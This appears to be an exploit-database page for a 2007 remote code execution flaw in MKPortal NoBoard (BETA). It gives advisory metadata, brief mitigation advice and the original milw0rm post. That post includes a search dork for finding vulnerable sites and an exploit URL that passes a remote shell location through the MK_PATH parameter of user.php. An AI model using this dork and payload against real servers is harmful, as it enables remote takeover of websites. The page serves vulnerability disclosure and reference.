header-logo
Suggest Exploit
vendor:
NoBoard (BETA)
by:
FiSh
7.5
CVSS
HIGH
Remote Code Execution
Unknown
CWE
Product Name: NoBoard (BETA)
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

MKPortal NoBoard (BETA)

The MKPortal NoBoard (BETA) script is vulnerable to remote code execution. An attacker can exploit this vulnerability by sending a specially crafted request to the user.php file, which allows them to execute arbitrary code on the server. This vulnerability was discovered by FiSh.

Mitigation:

It is recommended to update to a patched version of the MKPortal NoBoard script. Additionally, proper input validation should be implemented to prevent remote code execution vulnerabilities.
Source

Exploit-DB raw data:

###############################################################################################
#         ___   ___                         _
#        / _ \ / _ \                       | |
#   __ _| | | | | | |_ __  ___   _ __   ___| |_
#  / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | |  __/ |_
#  \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
#   __/ |
#  |___/
###############################################################################################
#Program Title ################################################################################
#MKPortal NoBoard (BETA)
#
#Script Download ##############################################################################
#http://www.mkportal.it/index.php?ind=downloads&op=entry_view&iden=804
#
#d0rk #########################################################################################
#"MK noboard"
#
#Spl0it #######################################################################################
#http://[ site ]/mkportal/include/user.php?MK_PATH=[ shell ]?
#
#vuln discovered by ###########################################################################
#FiSh
#
#shoutz: MurderSkillz, z3r0, milf, godXcel, clorox, katalyst, SyNiCaL, OD, pr0be, str0ke,
#sCuZz, canuck, Vipsta, c0ma, grumpy, SiCk, trintitty, 13337.org, a59, fury,
#<S>, Bernard, and everyone else at g00ns.net
###############################################################################################

# milw0rm.com [2007-07-14]